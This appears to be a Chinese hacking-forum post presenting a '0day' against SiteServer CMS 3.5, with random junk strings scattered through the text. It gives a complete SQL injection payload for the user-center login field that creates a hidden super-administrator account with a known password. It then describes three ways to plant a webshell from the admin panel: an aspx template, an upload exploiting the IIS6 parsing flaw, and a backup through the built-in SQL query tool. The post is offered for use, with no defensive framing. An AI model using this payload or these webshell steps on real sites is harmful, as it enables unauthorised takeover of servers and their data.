SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

. Q* w4 U' P6 [/ A" V- [stieserver官网:www.siteserver.cn
1 p$ h7 w5 f: k# Y: v; C

( U) i1 \9 l* `2 u1 t# {
/ ?2 q- h- q$ Y% iEXP:

4 h8 D. J1 l, j% c# u2 }3 M直接访问UserCenter/login.aspx


0 d7 u4 R( j) f
用户名处输入：

123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--

' c# ]% V+ N" V. ?0 f! T# M$ w0 S

* u) t+ N( K2 P密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
2 V1 }+ H( p$ G; O/ G4 H6 s6 A
8 G0 \1 i; z. y
: q" n6 t0 q5 v1 C  g* @7 p/ B1 {/ q
" h2 O/ F8 m1 q( R之后再访问后台SiteServer/login.aspx用插入的用户登陆


/ R4 M" Y( G  d3 K& ?4 A
后台拿webshell的三种方法：
2 G/ B) z6 ?6 m% d
一、
. I! {. u) w0 V% w3 |3 f! Q
" e8 t- r. V( D( \6 W站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

二、
2 i( l) J- C) _2 q: W4 o2 S" V( l% x
  W; R+ u9 L3 D0 }5 _& t* i成员权限-》添加用户-》用户名为：1.asp
1 A% ^! y! g7 ?) g- u8 r
http://127.0.0.1/usercenter/

, \( u9 W* h  e6 N用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

（ps：后台添加用户时不会验证是否含有非法字符）
& U9 N1 i) D" {& W7 K7 K7 n
三、

系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径
! C- V; l5 U5 N
) |2 q8 |3 ]9 O- @" \& s/ `系统工具-》数据库工具-》SQL语句查询
# s: k0 M* o1 f, `: u6 Z+ H这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
% i. W, h, ?7 [6 Z6 C* V